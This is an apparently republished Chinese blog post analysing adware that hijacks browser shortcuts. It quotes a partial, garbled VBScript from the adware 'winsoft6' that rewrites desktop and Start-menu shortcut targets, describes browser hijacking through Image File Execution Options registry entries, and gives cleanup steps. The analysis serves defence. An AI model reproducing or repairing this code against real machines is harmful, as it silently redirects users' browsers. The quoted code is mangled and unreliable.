admin管理员组文章数量:1531794
2024年5月31日发(作者:)
分析“网页快捷方式劫持”之深度隐藏
什么是“网页快捷方式劫持”?
相信不少遭受过流氓软件危害的人都有过这样的经历,不经意安装了流氓软件后,打开网页快捷方
式(目标路径为网址的快捷方式)会被劫持到了一个流氓站点(通常目标站是网址导航类的站点)。
我称这种现象为“网页快捷方式劫持”(浏览器默认首页被修改不属于该范围)。
(1)“网页快捷方式劫持”之常规伎俩。
快捷方式的目标路径被修改了。这是最简单的方法,也是最笨的方法。
我遇到的流氓软件winsoft6,它目录下有个文件,这个文件的功能就是将一些系统特殊目录
(桌面,启动菜单,开始菜单等)下的
网页快捷方式目标路径修改为恶意站点的地址。
部分代码如下:
程序代码:
Set WshShell = Object("")
strDesktop = lFolders("Desktop") :特殊文件夹“桌面”
Favorites = lFolders("Favorites") :特殊文件夹“桌面”
strttWinDir = EnvironmentStrings("%ProgramFiles%")
iescc=strttWinDir&"Internet "
ssd="粘贴"
winds = EnvironmentStrings("%SystemRoot%")
Set oShellLink = Shortcut(lFolders("AllUsersStartMenu")
+"程"&"序启"&"动腾讯" )
Path = "%Program"&"Files%winsoft622"&"" : 目标
cation = "%ProgramFiles%, 0" : 图标
gDirectory = "%ProgramFiles%winsoft6" : 起始位置
: 创建保存快捷方式
Sub Doits12345(lnktz)
Dim oldpath,newpath
oldpath = lnktz
Dim Wsh,fso
newpath = """"&strttWinDir&"Common """
Set Wsh = Object("")
Set fso = CreateObject("stemObject")
Dim Folders
Folders = lFolders("AllUsersDesktop")
Set f = der(Folders)
Set fc =
For Each f1 in fc
ext = LCase(ensionName(f1))
if ext = "lnk" then
Set oShlnk = Shortcut(f1)
If Instr(Path,oldpath) > 0 Then
nts = newpath
End If
Set oShLnk=NoThing
end if
Next
(省略部分代码......)
Set WSH = Nothing
End Sub
Call Doits12345("TTraveler"&".exe")
Call Doits12345("")
Call Doits12345("")
Call Doits12345("")
Call Doits12345("")
Call Doits12345("360SE"&".exe")
清除方法:通过查看快捷方式的属性很容易发现和修复,这个没什么JS含量,不足为奇。
(2)“网址快捷方式劫持”之印象劫持:
现象:
网页快捷方式的目标路径没有被修改,打开快捷方式会被劫持到恶意站点。
直接运行浏览器主程序(在浏览器目录下直接运行)也会被劫持,通常常见的浏览器
(,,)都被劫持了。
原理及解决方案:
浏览器进程被印象劫持了,删除注册表中相应的印象劫持项即可
(在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution Options下找到浏览器进程名对应的项,删除即可)。
也可以用注册表搜索工具搜索恶意网站的地址,就可以找到(不要加)对应的映像劫持项,
然后删除它们。
深度GHOSTXP2010贺岁珍藏版就存在这个问题,详情可以查看我的这篇文章《去掉“深度
GHOSTXP2010贺岁珍藏版”浏览器映像劫持》,
版权声明:本文标题:分析“网页快捷方式劫持”之深度隐藏 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1717103139a534592.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论